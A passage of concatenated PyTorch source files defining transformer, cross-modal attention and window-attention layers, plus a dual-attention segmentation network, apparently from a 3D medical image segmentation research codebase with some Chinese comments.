config.patch_size = patch_size config.img_size = img_size return config def swish(x): return x * torch.sigmoid(x) ACT2FN = {"gelu": torch.nn.functional.gelu, "relu": torch.nn.functional.relu, "swish": swish} class Attention(nn.Module): def __init__(self, config): super(Attention, self).__init__() self.num_attention_heads = config.transformer["num_heads"] self.attention_head_size = int(config.hidden_size / self.num_attention_heads) self.all_head_size = self.num_attention_heads * self.attention_head_size self.query = nn.Linear(config.hidden_size, self.all_head_size) self.key = nn.Linear(config.hidden_size, self.all_head_size) self.value = nn.Linear(config.hidden_size, self.all_head_size) self.out = nn.Linear(config.hidden_size, config.hidden_size) self.attn_dropout = nn.Dropout(config.transformer["attention_dropout_rate"]) self.proj_dropout = nn.Dropout(config.transformer["attention_dropout_rate"]) self.softmax = nn.Softmax(dim=-1) def transpose_for_scores(self, x): new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size) x = x.view(*new_x_shape) return x.permute(0, 2, 1, 3) def forward(self, hidden_states): mixed_query_layer = self.query(hidden_states) mixed_key_layer = self.key(hidden_states) mixed_value_layer = self.value(hidden_states) query_layer = self.transpose_for_scores(mixed_query_layer) key_layer = self.transpose_for_scores(mixed_key_layer) value_layer = self.transpose_for_scores(mixed_value_layer) attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2)) attention_scores = attention_scores / math.sqrt(self.attention_head_size) attention_probs = self.softmax(attention_scores) attention_probs = self.attn_dropout(attention_probs) context_layer = torch.matmul(attention_probs, value_layer) context_layer = context_layer.permute(0, 2, 1, 3).contiguous() new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,) context_layer = context_layer.view(*new_context_layer_shape) attention_output = self.out(context_layer) attention_output = self.proj_dropout(attention_output) return attention_output class Mlp(nn.Module): def __init__(self, config): super(Mlp, self).__init__() self.fc1 = nn.Linear(config.hidden_size, config.transformer["mlp_dim"]) self.fc2 = nn.Linear(config.transformer["mlp_dim"], config.hidden_size) self.act_fn = ACT2FN["gelu"] self.dropout = nn.Dropout(config.transformer["dropout_rate"]) def forward(self, x): x = self.fc1(x) x = self.act_fn(x) x = self.dropout(x) x = self.fc2(x) x = self.dropout(x) return x class Embeddings(nn.Module): """Construct the embeddings from patch, position embeddings. """ def __init__(self, config): super(Embeddings, self).__init__() self.config = config img_size = config.img_size in_channels = config.in_channels patch_size = config["patch_size"] n_patches = (img_size[0] // patch_size[0]) * (img_size[1] // patch_size[1]) * (img_size[2] // patch_size[2]) self.patch_embeddings = nn.Conv3d(in_channels=in_channels, out_channels=config.hidden_size, kernel_size=patch_size, stride=patch_size) self.position_embeddings = nn.Parameter(torch.zeros(1, n_patches, config.hidden_size)) self.dropout = nn.Dropout(config.transformer["dropout_rate"]) def forward(self, x): x = self.patch_embeddings(x) # (B, hidden. n_patches^(1/2), n_patches^(1/2)) x = x.flatten(2) x = x.transpose(-1, -2) # (B, n_patches, hidden) embeddings = x + self.position_embeddings embeddings = self.dropout(embeddings) return embeddings class BlockMulti(nn.Module): def __init__(self, config): super(BlockMulti, self).__init__() self.config = config self.hidden_size = config.hidden_size self.attention_norm = nn.LayerNorm(config.hidden_size, eps=1e-6) self.ffn_norm = nn.LayerNorm(config.hidden_size, eps=1e-6) self.ffn = Mlp(config) self.attn = Attention(config) def forward(self, x): h = x x = self.attention_norm(x) x = self.attn(x) x = x + h h = x x = self.ffn_norm(x) x = self.ffn(x) x = x + h return x class SelfTransformerLayer(nn.Module): def __init__(self, in_channels, out_channels, patch_size, img_size, mlp_size=256, num_layers=1): super().__init__() self.config = get_config(in_channels=in_channels, hidden_size=out_channels, patch_size=patch_size, img_size=img_size, mlp_dim=mlp_size) self.block_list = nn.ModuleList([BlockMulti(self.config) for i in range(num_layers)]) self.embeddings = Embeddings(self.config) def forward(self, x, encoder=False): input_shape = self.config.img_size batch_size = x.shape[0] x = self.embeddings(x) for l in self.block_list: x = l(x) if encoder: return x x = x.transpose(-1, -2) out_size = (input_shape[0] // self.config.patch_size[0], input_shape[1] // self.config.patch_size[1], input_shape[2] // self.config.patch_size[2],) x = x.view((batch_size, self.config.hidden_size, out_size[0], out_size[1], out_size[2])) return x class AttentionCrossModal(nn.Module): def __init__(self, config): super(AttentionCrossModal, self).__init__() self.num_attention_heads = config.transformer["num_heads"] self.attention_head_size = int(config.hidden_size / self.num_attention_heads) self.all_head_size = self.num_attention_heads * self.attention_head_size self.query = nn.Linear(config.hidden_size, self.all_head_size) self.key = nn.Linear(config.hidden_size, self.all_head_size) self.value = nn.Linear(config.hidden_size, self.all_head_size) self.out = nn.Linear(config.hidden_size, config.hidden_size) self.attn_dropout = nn.Dropout(config.transformer["attention_dropout_rate"]) self.proj_dropout = nn.Dropout(config.transformer["attention_dropout_rate"]) self.softmax = nn.Softmax(dim=-1) def transpose_for_scores(self, x): new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size) x = x.view(*new_x_shape) return x.permute(0, 2, 1, 3) def forward(self, hidden_states, kv): ## kv 是别的模态的特征。 mixed_query_layer = self.query(hidden_states) mixed_key_layer = self.key(kv) mixed_value_layer = self.value(kv) query_layer = self.transpose_for_scores(mixed_query_layer) key_layer = self.transpose_for_scores(mixed_key_layer) value_layer = self.transpose_for_scores(mixed_value_layer) attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2)) attention_scores = attention_scores / math.sqrt(self.attention_head_size) attention_probs = self.softmax(attention_scores) attention_probs = self.attn_dropout(attention_probs) context_layer = torch.matmul(attention_probs, value_layer) context_layer = context_layer.permute(0, 2, 1, 3).contiguous() new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,) context_layer = context_layer.view(*new_context_layer_shape) attention_output = self.out(context_layer) attention_output = self.proj_dropout(attention_output) return attention_output class BlockCrossAtt(nn.Module): ## 跨模态的attention def __init__(self, config): super().__init__() self.hidden_size = config.hidden_size self.attention_norm = nn.LayerNorm(self.hidden_size, eps=1e-6) self.attention_norm_cross = nn.LayerNorm(self.hidden_size, eps=1e-6) self.ffn_norm = nn.LayerNorm(self.hidden_size, eps=1e-6) self.ffn = Mlp(config) self.attn_cross = AttentionCrossModal(config) def forward(self, q, kv): # q是其他模态特征。 h = q x = self.attn_cross(q, kv) x = x + h x = self.attention_norm_cross(x) h = x x = self.ffn(x) x = x + h x = self.ffn_norm(x) return x class CrossTransLayer(nn.Module): def __init__(self, model_num, in_channels, hidden_size, patch_size, img_size, mlp_size=256, token_mixer_size=32): super().__init__() self.embeddings = nn.ModuleList([]) self.config = get_config(in_channels=in_channels, hidden_size=hidden_size, patch_size=patch_size, img_size=img_size, mlp_dim=mlp_size) self.model_num = model_num patch_num = (img_size[0] // patch_size[0]) * (img_size[1] // patch_size[1]) * (img_size[2] // patch_size[2]) self.token_mixer = nn.Linear(patch_num, token_mixer_size) for i in range(model_num): self.embeddings.append(Embeddings(self.config)) self.cross_attention = BlockCrossAtt(config=self.config) def forward(self, q, kv): pass embed_x = [] for i in range(self.model_num): x = self.embeddings[i](kv[:, i]) x = x.transpose(-1, -2) x = self.token_mixer(x) x = x.transpose(-1, -2) embed_x.append(x) embed_x = torch.cat(embed_x, dim=1) # print(f"embed x shape is {embed_x.shape}") corss_out = self.cross_attention(q, embed_x) return corss_out class FusionSelfCrossTrans(nn.Module): def __init__(self, model_num, in_channels, hidden_size, patch_size, img_size, mlp_size=256, self_num_layer=2, window_size=(2, 4, 4), token_mixer_size=32): super().__init__() self.img_size = img_size self.patch_size = patch_size self.hidden_size = hidden_size self.self_block = MultiAttentionTransformer(in_channels=model_num*in_channels, out_channels=hidden_size, patch_size=patch_size, img_size=img_size, mlp_size=mlp_size, num_layers=self_num_layer, window_size=window_size) # self.self_block = SelfTransformerLayer(in_channels=model_num*in_channels, # out_channels=hidden_size, # patch_size=patch_size, # img_size=img_size, mlp_size=mlp_size, # num_layers=self_num_layer) self.cross_trans = CrossTransLayer(model_num=model_num, in_channels=in_channels, hidden_size=hidden_size, patch_size=patch_size, img_size=img_size, mlp_size=mlp_size, token_mixer_size=token_mixer_size) def forward(self, x): ## cross attention后的shape 跟 q 一致, 所以q是self-trans-out ## x: (batch , model_num , hidden_size, d, w, h) self_trans_in = rearrange(x, "b m f d w h -> b (m f) d w h") # self_trans_out = self.self_block(self_trans_in, encoder=True) self_trans_out = self.self_block(self_trans_in) ## self_trans_out 经过multi attention trans以后,尺寸为 (batch, hidden_size, d, w, h) self_trans_out = rearrange(self_trans_out, "b c d w h -> b (d w h) c") input_shape = self.img_size batch_size = x.shape[0] cross_trans_out = self.cross_trans(self_trans_out, x) x = cross_trans_out x = x.transpose(-1, -2) out_size = (input_shape[0] // self.patch_size[0], input_shape[1] // self.patch_size[1], input_shape[2] // self.patch_size[2],) x = x.view((batch_size, self.hidden_size, out_size[0], out_size[1], out_size[2])) return x ``` #### File: layers/temp_save/multi_attention copy.py ```python import numpy as np import math from torch import nn, einsum from einops import rearrange, repeat import torch import ml_collections from typing import Union from medical_seg.networks.nets.co_unet import UpCat def get_config(in_channels=1, hidden_size=128, img_size=(1, 1, 1), patch_size=(1, 1, 1), mlp_dim=256, num_heads=8, window_size=(8, 8, 8)): config = ml_collections.ConfigDict() config.hidden_size = hidden_size config.in_channels = in_channels config.transformer = ml_collections.ConfigDict() config.transformer.mlp_dim = mlp_dim config.transformer.num_heads = num_heads config.transformer.num_layers = 1 config.transformer.attention_dropout_rate = 0.0 config.transformer.dropout_rate = 0.1 config.patch_size = patch_size config.img_size = img_size config.window_size = window_size config.num_heads = num_heads config.window_size = window_size return config def swish(x): return x * torch.sigmoid(x) ACT2FN = {"gelu": torch.nn.functional.gelu, "relu": torch.nn.functional.relu, "swish": swish} class Attention(nn.Module): def __init__(self, config): super(Attention, self).__init__() self.num_attention_heads = config.transformer["num_heads"] self.attention_head_size = int(config.hidden_size / self.num_attention_heads) self.all_head_size = self.num_attention_heads * self.attention_head_size self.query = nn.Linear(config.hidden_size, self.all_head_size) self.key = nn.Linear(config.hidden_size, self.all_head_size) self.value = nn.Linear(config.hidden_size, self.all_head_size) self.out = nn.Linear(config.hidden_size, config.hidden_size) self.attn_dropout = nn.Dropout(config.transformer["attention_dropout_rate"]) self.proj_dropout = nn.Dropout(config.transformer["attention_dropout_rate"]) self.softmax = nn.Softmax(dim=-1) def transpose_for_scores(self, x): new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size) x = x.view(*new_x_shape) return x.permute(0, 2, 1, 3) def forward(self, hidden_states, attention=False): mixed_query_layer = self.query(hidden_states) mixed_key_layer = self.key(hidden_states) mixed_value_layer = self.value(hidden_states) query_layer = self.transpose_for_scores(mixed_query_layer) key_layer = self.transpose_for_scores(mixed_key_layer) value_layer = self.transpose_for_scores(mixed_value_layer) attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2)) attention_scores = attention_scores / math.sqrt(self.attention_head_size) attention_probs = self.softmax(attention_scores) attention_probs = self.attn_dropout(attention_probs) context_layer = torch.matmul(attention_probs, value_layer) context_layer = context_layer.permute(0, 2, 1, 3).contiguous() new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,) context_layer = context_layer.view(*new_context_layer_shape) attention_output = self.out(context_layer) attention_output = self.proj_dropout(attention_output) if attention: return attention_output, attention_probs return attention_output def get_relative_distances(window_size): indices = torch.tensor(np.array([[x, y, z] for x in range(window_size[0]) for y in range(window_size[1]) for z in range(window_size[2])])) distances = indices[None, :, :] - indices[:, None, :] return distances class WindowAttention(nn.Module): def __init__(self, dim, heads, head_dim, window_size, relative_pos_embedding): super().__init__() inner_dim = head_dim * heads self.heads = heads self.scale = head_dim ** -0.5 self.window_size = window_size self.relative_pos_embedding = relative_pos_embedding self.to_qkv = nn.Linear(dim, inner_dim * 3, bias=False) if self.relative_pos_embedding: self.relative_indices = get_relative_distances(window_size) min_indice = self.relative_indices.min() self.relative_indices += (-min_indice) max_indice = self.relative_indices.max().item() self.pos_embedding = nn.Parameter(torch.randn(max_indice + 1, max_indice + 1, max_indice + 1)) else: self.pos_embedding = nn.Parameter(torch.randn(window_size ** 2, window_size ** 2)) self.to_out = nn.Linear(inner_dim, dim) def forward(self, x): b, n_h, n_w, n_d, _, h = *x.shape, self.heads qkv = self.to_qkv(x).chunk(3, dim=-1) nw_h = n_h // self.window_size[0] nw_w = n_w // self.window_size[1] nw_d = n_d // self.window_size[2] ## h 为注意力头的个数 nw_h 为h(长)的维度上窗口个数 wh为窗口的长 nw_w同理 ## 如何去进行窗口内部的attention计算呢,其实就是设置成这个shape (b, 注意力头个数,窗口个数,窗口面积,hidden size) ## 这样就做到了在窗口面积内进行attention计算。 q, k, v = map( lambda t: rearrange(t, 'b (nw_h w_h) (nw_w w_w) (nw_d w_d) (h d) -> b h (nw_h nw_w nw_d) (w_h w_w w_d) d', h=h, w_h=self.window_size[0], w_w=self.window_size[1], w_d=self.window_size[2]), qkv) dots = einsum('b h w i d, b h w j d -> b h w i j', q, k) * self.scale # 注意力结果为 (b,注意力头个数, 窗口个数, 窗口长度,窗口宽度) 所以注意力表示的意思呢 就是每个窗口内互相的注意力大小 if self.relative_pos_embedding: dots += self.pos_embedding[self.relative_indices[:, :, 0], self.relative_indices[:, :, 1], self.relative_indices[:, :, 2]] else: dots += self.pos_embedding # if self.shifted: # dots[:, :, -nw_w:] += self.upper_lower_mask # dots[:, :, nw_w - 1::nw_w] += self.left_right_mask attn = dots.softmax(dim=-1) out = einsum('b h w i j, b h w j d -> b h w i d', attn, v) out = rearrange(out, 'b h (nw_h nw_w nw_d) (w_h w_w w_d) d -> b (nw_h w_h) (nw_w w_w) (nw_d w_d) (h d)', h=h, w_h=self.window_size[0], w_w=self.window_size[1], w_d = self.window_size[2], nw_h=nw_h, nw_w=nw_w, nw_d=nw_d) out = self.to_out(out) return out class MultiAttention(nn.Module): def __init__(self, config, is_position=False): super().__init__() self.config = config self.is_position = is_position self.v_embedding = Embeddings(config, types=1) self.h_embedding = Embeddings(config, types=2) self.window_embedding = Embeddings(config, types=0, is_window=True) self.v_attention = Attention(config) self.h_attention = Attention(config) self.window_attention = WindowAttention(config.hidden_size, config.num_heads, config.hidden_size // config.num_heads, config.window_size, relative_pos_embedding=True) if is_position: self.pos_embedding_1 = Postion_embedding(config, types=1) self.pos_embedding_2 = Postion_embedding(config, types=2) def forward(self, x): batch_size, hidden_size, D, W, H = x.shape x_1 = x.view(batch_size*D, hidden_size, W, H) x_2 = x.view(W*H*batch_size, hidden_size, D) x_3 = x.permute(0, 2, 3, 4, 1) x_1 = x_1.flatten(2) x_1 = x_1.transpose(-1, -2) # (B, n_patches, hidden) x_2 = x_2.flatten(2) x_2 = x_2.transpose(-1, -2) # (B, n_patches, hidden) if self.is_position: x_1 = self.pos_embedding_1(x_1) x_2 = self.pos_embedding_2(x_2) x_1 = self.v_attention(x_1) x_2 = self.h_attention(x_2) x_3 = self.window_attention(x_3) x_3 = x_3.view(batch_size, D*W*H, hidden_size).contiguous() x_1 = x_1.view((-1, self.config.hidden_size, W, H)).contiguous() x_1 = x_1.view((batch_size, D*W*H, self.config.hidden_size)) x_2 = x_2.view((-1, self.config.hidden_size, D)).contiguous() x_2 = x_2.view((batch_size, D*W*H, self.config.hidden_size)) return x_1 + x_2 + x_3 class Mlp(nn.Module): def __init__(self, config): super(Mlp, self).__init__() self.fc1 = nn.Linear(config.hidden_size, config.transformer["mlp_dim"]) self.fc2 = nn.Linear(config.transformer["mlp_dim"], config.hidden_size) self.act_fn = ACT2FN["gelu"] self.dropout = nn.Dropout(config.transformer["dropout_rate"]) def forward(self, x): x = self.fc1(x) x = self.act_fn(x) x = self.dropout(x) x = self.fc2(x) x = self.dropout(x) return x class Embeddings(nn.Module): """Construct the embeddings from patch, position embeddings. """ def __init__(self, config, types=0, is_window=False): super(Embeddings, self).__init__() self.is_window = is_window self.types = types self.config = config img_size = config.img_size in_channels = config.in_channels patch_size = config["patch_size"] self.patch_embeddings = nn.Conv3d(in_channels=in_channels, out_channels=config.hidden_size, kernel_size=patch_size, stride=patch_size) self.dropout = nn.Dropout(config.transformer["dropout_rate"]) def forward(self, x): x = self.patch_embeddings(x) # (B, hidden. n_patches^(1/2), n_patches^(1/2)) # b, hidden, zz, xx, yy = x.shape # if self.types == 0: # pass # elif self.types == 1: # ## z directions # x = x.view(b*zz, hidden, xx, yy) # elif self.types == 2: # x = x.view(xx*yy*b, hidden, zz) # if self.is_window: # return x.permute(0, 2, 3, 4, 1) # x = x.flatten(2) # x = x.transpose(-1, -2) # (B, n_patches, hidden) # embeddings = x + self.position_embeddings # embeddings = self.dropout(embeddings) return x class Postion_embedding(nn.Module): def __init__(self, config, types=0): super().__init__() img_size = config.img_size patch_size = config.patch_size if types == 0: self.position_embeddings = nn.Parameter(torch.zeros(1, (img_size[0] // patch_size[0]) * (img_size[1] // patch_size[1]) * (img_size[2] // patch_size[2]), config.hidden_size)) elif types == 1: self.position_embeddings = nn.Parameter(torch.zeros(1, (img_size[1] // patch_size[1]) * (img_size[2] // patch_size[2]), config.hidden_size)) elif types == 2: self.position_embeddings = nn.Parameter(torch.zeros(1, (img_size[0] // patch_size[0]), config.hidden_size)) def forward(self, x): return x + self.position_embeddings class BlockMulti(nn.Module): def __init__(self, config, is_position=False): super(BlockMulti, self).__init__() self.config = config self.input_shape = config.img_size self.hidden_size = config.hidden_size self.attention_norm = nn.LayerNorm(config.hidden_size, eps=1e-6) self.ffn_norm = nn.LayerNorm(config.hidden_size, eps=1e-6) self.ffn = Mlp(config) self.attn = MultiAttention(config, is_position=is_position) def forward(self, x, attention=False): batch_size, hidden_size, D, W, H = x.shape h = x.view(batch_size, D*W*H, hidden_size) if attention: x, att = self.attn(x, attention) else : x = self.attn(x) x = x + h x = self.attention_norm(x) h = x x = self.ffn(x) x = x + h x = self.ffn_norm(x) x = x.transpose(-1, -2) out_size = (self.input_shape[0] // self.config.patch_size[0], self.input_shape[1] // self.config.patch_size[1], self.input_shape[2] // self.config.patch_size[2],) x = x.view((batch_size, self.config.hidden_size, out_size[0], out_size[1], out_size[2])).contiguous() return x # class GlobalAttention(nn.Module): # def __init__(self, in_channels, out_channels, patch_size, img_size, num_heads=1, mlp_size=256, num_layers=1, types=0): # super().__init__() # self.config = get_config(in_channels=in_channels, hidden_size=out_channels, # patch_size=patch_size, img_size=img_size, mlp_dim=mlp_size, num_heads=num_heads) # self.attention = Attention(self.config) # self.embeddings = Embeddings(self.config, types=types) # self.types = types # def forward(self, x): # input_shape = self.config.img_size # batch_size = x.shape[0] # x = self.embeddings(x) # return class SpatialTransformerLayer(nn.Module): def __init__(self, in_channels, out_channels, patch_size, img_size, num_heads=8, mlp_size=256, num_layers=1, window_size=(8, 8, 8)): super().__init__() self.config = get_config(in_channels=in_channels, hidden_size=out_channels, patch_size=patch_size, img_size=img_size, mlp_dim=mlp_size, num_heads=num_heads, window_size=window_size) self.block_list = nn.ModuleList([BlockMulti(self.config, is_position=True)if i == 0 else BlockMulti(self.config) for i in range(num_layers)]) self.embeddings = Embeddings(self.config) def forward(self, x): x = self.embeddings(x) for l in self.block_list: x = l(x) return x class MyTransformer(nn.Module): def __init__(self, in_channels=3, out_channels=2, img_size=(128, 128, 128), act: Union[str, tuple] = ("LeakyReLU", {"negative_slope": 0.1, "inplace": True}), norm: Union[str, tuple] = ("instance", {"affine": True}), dropout: Union[float, tuple] = 0.0, upsample: str = "deconv", deepth = [2, 2, 2], fea = [16, 16, 32, 64], patchs_size=[(4, 4, 4), (2, 2, 2), (2, 2, 2)], window_size=(4, 4, 4) ): super().__init__() self.deepth = deepth self.patchs_size = patchs_size self.fea = fea self.first_conv = nn.Conv3d(in_channels, self.fea[0], kernel_size=3, padding=1, stride=1) self.final_conv = nn.Conv3d(self.fea[0], out_channels=out_channels, kernel_size=1, padding=0) self.trans = nn.ModuleList([]) layer_img_size = img_size for i in range(len(self.deepth)): self.trans.append(SpatialTransformerLayer(in_channels=self.fea[i], out_channels=self.fea[i+1], patch_size=self.patchs_size[i], img_size=layer_img_size, num_heads=8, mlp_size=self.fea[i+1], num_layers=self.deepth[i], window_size=window_size)) layer_img_size = (layer_img_size[0] // self.patchs_size[i][0], layer_img_size[1] // self.patchs_size[i][1], layer_img_size[2] // self.patchs_size[i][2]) # self.upcat_4 = UpCat(3, self.fea[4], self.fea[3], self.fea[3], act, norm, dropout, upsample, pool_size=self.patchs_size[3]) self.upcat_3 = UpCat(3, self.fea[3], self.fea[2], self.fea[2], act, norm, dropout, upsample, pool_size=self.patchs_size[2]) self.upcat_2 = UpCat(3, self.fea[2], self.fea[1], self.fea[1], act, norm, dropout, upsample, pool_size=self.patchs_size[1]) self.upcat_1 = UpCat(3, self.fea[1], self.fea[0], self.fea[0], act, norm, dropout, upsample, halves=False, pool_size=self.patchs_size[0]) def forward(self, x): # x = self.trans(x) x = self.first_conv(x) down = [x] for l in self.trans: x = l(x) down.append(x) # print(x.shape) # for xx in down: # print(xx.shape) # u4 = self.upcat_4(down[4], down[3]) u3 = self.upcat_3(down[3], down[2]) u2 = self.upcat_2(u3, down[1]) u1 = self.upcat_1(u2, down[0]) logits = self.final_conv(u1) return logits # return x if __name__ == '__main__': # t1 = torch.rand(1, 2, 32, 128, 128) # in_channels = 2 # out_channels = 3 # img_size = (32, 128, 128) # patch_size = (16, 16, 16) # num_layer = 1 # mlp_size = 32 # hidden_size = 128 # conv3d = nn.Conv3d(3, 6, kernel_size=(8, 32, 32), stride=(8, 32, 32)) # # out = conv3d(t1) # # print(out.shape) # # out = out.flatten(2) # print(out.shape) # config = get_config() # b = TransformerLayer(in_channels=3, out_channels=64, patch_size=(16, 16, 16), img_size=(32, 128, 128)) # out = b(t1) # print(out.shape) # b = TransformerLayerMulti(in_channels=2, out_channels=2, patch_size=(16, 16, 16), img_size=(32, 128, 128), num_layers=2) # # print(b(t1).shape) # config = get_config(in_channels=in_channels, out_channels=hidden_size, # patch_size=patch_size, img_size=img_size, mlp_dim=mlp_size) # cross_att = BlockMultiCrossModal(config) # # t1 = torch.rand(1, 10, 128) # t2 = torch.rand(1, 10, 128) # # out = cross_att(t1, t2) # # print(out.shape) # b = TransformerLayerMultiCrossModal(in_channels=2, out_channels=2, patch_size=(4, 16, 16), img_size=(32, 128, 128), # num_layers=2) # t2 = torch.rand(1, 2, 32, 128, 128) # # out = b(t1, t2) # # print(out.shape) # net = DoubleRouteTransformer(in_channels=2, out_channels=2, patch_size=(4, 16, 16), img_size=(32, 128, 128), num_layer=2) # out = net(t1, t2) # print(out.shape) # t1 = torch.rand(1, 16, 16, 16, 128) # net = SpatialTransformerLayer(2, 64, (1, 1, 1), (16, 16, 16), mlp_size=128, num_layers=2, types=2) # out = net(t1) # print(out.shape) # net = WindowAttention(dim=128, heads=16, head_dim=8, window_size=(4, 4, 4), relative_pos_embedding=True) # out = net(t1) # print(out.shape) # config = get_config(in_channels=128, # patch_size=(1, 1, 1), img_size=(16, 16, 16), mlp_dim=64) # net = MultiAttention(config) # t1 = torch.rand(1, 128, 16, 16, 16) # out = net(t1) # print(out.shape) ######### t1 = torch.rand(1, 3, 128, 128, 128) # net = SpatialTransformerLayer(in_channels=64, out_channels=128, patch_size=(2, 2, 2), img_size=(16, 16, 16), num_layers=1, window_size=(8, 8, 8)) net = MyTransformer(in_channels=3, out_channels=2, img_size=(128, 128, 128)) out = net(t1) print(out.shape) ``` #### File: nets/msga_net/my_stacked_danet.py ```python from functools import reduce ## Journal of Biomedical And Health Informatics (JBHI) 2020 import pdb import torch import torch.nn.functional as F import torch.nn as nn from torch.autograd import Variable from bis3d_v2.networks.nets.msga_net.attention import ( PAM_Module, CAM_Module, semanticModule, PAM_CAM_Layer, MultiConv ) from bis3d_v2.networks.nets.msga_net.resnext101_regular import ResNeXt101 class DAF_stack(nn.Module): def __init__(self, in_channels, out_channels_end): super(DAF_stack, self).__init__() self.resnext = ResNeXt101(in_channels) self.down4 = nn.Sequential( nn.Conv2d(2048, 64, kernel_size=1), nn.BatchNorm2d(64), nn.PReLU() ) self.down3 = nn.Sequential( nn.Conv2d(1024, 64, kernel_size=1), nn.BatchNorm2d(64), nn.PReLU() ) self.down2 = nn.Sequential( nn.Conv2d(512, 64, kernel_size=1), nn.BatchNorm2d(64), nn.PReLU() ) self.down1 = nn.Sequential( nn.Conv2d(256, 64, kernel_size=1), nn.BatchNorm2d(64), nn.PReLU() ) inter_channels = 64 out_channels=64 self.conv6_1 = nn.Sequential(nn.Dropout2d(0.1, False), nn.Conv2d(64, out_channels, 1)) self.conv6_2 = nn.Sequential(nn.Dropout2d(0.1, False), nn.Conv2d(64, out_channels, 1)) self.conv6_3 = nn.Sequential(nn.Dropout2d(0.1, False), nn.Conv2d(64, out_channels, 1)) self.conv6_4 = nn.Sequential(nn.Dropout2d(0.1, False), nn.Conv2d(64, out_channels, 1)) self.conv7_1 = nn.Sequential(nn.Dropout2d(0.1, False), nn.Conv2d(64, out_channels, 1)) self.conv7_2 = nn.Sequential(nn.Dropout2d(0.1, False), nn.Conv2d(64, out_channels, 1)) self.conv7_3 = nn.Sequential(nn.Dropout2d(0.1, False), nn.Conv2d(64, out_channels, 1)) self.conv7_4 = nn.Sequential(nn.Dropout2d(0.1, False), nn.Conv2d(64, out_channels, 1)) self.conv8_1=nn.Conv2d(64,64,1) self.conv8_2=nn.Conv2d(64,64,1) self.conv8_3=nn.Conv2d(64,64,1) self.conv8_4=nn.Conv2d(64,64,1) self.conv8_11=nn.Conv2d(64,64,1) self.conv8_12=nn.Conv2d(64,64,1) self.conv8_13=nn.Conv2d(64,64,1) self.conv8_14=nn.Conv2d(64,64,1) self.softmax_1 = nn.Softmax(dim=-1) self.pam_attention_1_1= PAM_CAM_Layer(64, True) self.cam_attention_1_1= PAM_CAM_Layer(64, False) self.semanticModule_1_1 = semanticModule(128) self.conv_sem_1_1 = nn.Conv2d(128, 64, kernel_size=3, padding=1) self.conv_sem_1_2 = nn.Conv2d(128, 64, kernel_size=3, padding=1) self.conv_sem_1_3 = nn.Conv2d(128, 64, kernel_size=3, padding=1) self.conv_sem_1_4 = nn.Conv2d(128, 64, kernel_size=3, padding=1) #Dual Attention mechanism self.pam_attention_1_2 = PAM_CAM_Layer(64) self.cam_attention_1_2 = PAM_CAM_Layer(64, False) self.pam_attention_1_3 = PAM_CAM_Layer(64) self.cam_attention_1_3 = PAM_CAM_Layer(64, False) self.pam_attention_1_4 = PAM_CAM_Layer(64) self.cam_attention_1_4 = PAM_CAM_Layer(64, False) self.pam_attention_2_1 = PAM_CAM_Layer(64) self.cam_attention_2_1 = PAM_CAM_Layer(64, False) self.semanticModule_2_1 = semanticModule(128) self.conv_sem_2_1 = nn.Conv2d(128, 64, kernel_size=3, padding=1) self.conv_sem_2_2 = nn.Conv2d(128, 64, kernel_size=3, padding=1) self.conv_sem_2_3 = nn.Conv2d(128, 64, kernel_size=3, padding=1) self.conv_sem_2_4 = nn.Conv2d(128, 64, kernel_size=3, padding=1) self.pam_attention_2_2 = PAM_CAM_Layer(64) self.cam_attention_2_2 = PAM_CAM_Layer(64, False) self.pam_attention_2_3 = PAM_CAM_Layer(64) self.cam_attention_2_3 = PAM_CAM_Layer(64, False) self.pam_attention_2_4 = PAM_CAM_Layer(64) self.cam_attention_2_4 = PAM_CAM_Layer(64, False) self.fuse1 = MultiConv(256, 64, False) self.attention4 = MultiConv(128, 64) self.attention3 = MultiConv(128, 64) self.attention2 = MultiConv(128, 64) self.attention1 = MultiConv(128, 64) self.refine4 = MultiConv(128, 64, False) self.refine3 = MultiConv(128, 64, False) self.refine2 = MultiConv(128, 64, False) self.refine1 = MultiConv(128, 64, False) self.predict4 = nn.Conv2d(64, out_channels_end, kernel_size=1) self.predict3 = nn.Conv2d(64, out_channels_end, kernel_size=1) self.predict2 = nn.Conv2d(64, out_channels_end, kernel_size=1) self.predict1 = nn.Conv2d(64, out_channels_end, kernel_size=1) self.predict4_2 = nn.Conv2d(64, out_channels_end, kernel_size=1) self.predict3_2 = nn.Conv2d(64, out_channels_end, kernel_size=1) self.predict2_2 = nn.Conv2d(64, out_channels_end, kernel_size=1) self.predict1_2 = nn.Conv2d(64, out_channels_end, kernel_size=1) def forward(self, x): layer0 = self.resnext.layer0(x) layer1 = self.resnext.layer1(layer0) layer2 = self.resnext.layer2(layer1) layer3 = self.resnext.layer3(layer2) layer4 = self.resnext.layer4(layer3) down4 = F.upsample(self.down4(layer4), size=layer1.size()[2:], mode='bilinear') down3 = F.upsample(self.down3(layer3), size=layer1.size()[2:], mode='bilinear') down2 = F.upsample(self.down2(layer2), size=layer1.size()[2:], mode='bilinear') down1 = self.down1(layer1) predict4 = self.predict4(down4) predict3 = self.predict3(down3) predict2 = self.predict2(down2) predict1 = self.predict1(down1) fuse1 = self.fuse1(torch.cat((down4, down3, down2, down1), 1)) semVector_1_1,semanticModule_1_1 = self.semanticModule_1_1(torch.cat((down4, fuse1),1)) attn_pam4 = self.pam_attention_1_4(torch.cat((down4, fuse1), 1)) attn_cam4 = self.cam_attention_1_4(torch.cat((down4, fuse1), 1)) attention1_4=self.conv8_1((attn_cam4+attn_pam4)*self.conv_sem_1_1(semanticModule_1_1)) semVector_1_2, semanticModule_1_2 = self.semanticModule_1_1(torch.cat((down3, fuse1), 1)) attn_pam3 = self.pam_attention_1_3(torch.cat((down3, fuse1), 1)) attn_cam3 = self.cam_attention_1_3(torch.cat((down3, fuse1), 1)) attention1_3=self.conv8_2((attn_cam3+attn_pam3)*self.conv_sem_1_2(semanticModule_1_2)) semVector_1_3, semanticModule_1_3 = self.semanticModule_1_1(torch.cat((down2, fuse1), 1)) attn_pam2 = self.pam_attention_1_2(torch.cat((down2, fuse1), 1)) attn_cam2 = self.cam_attention_1_2(torch.cat((down2, fuse1), 1)) 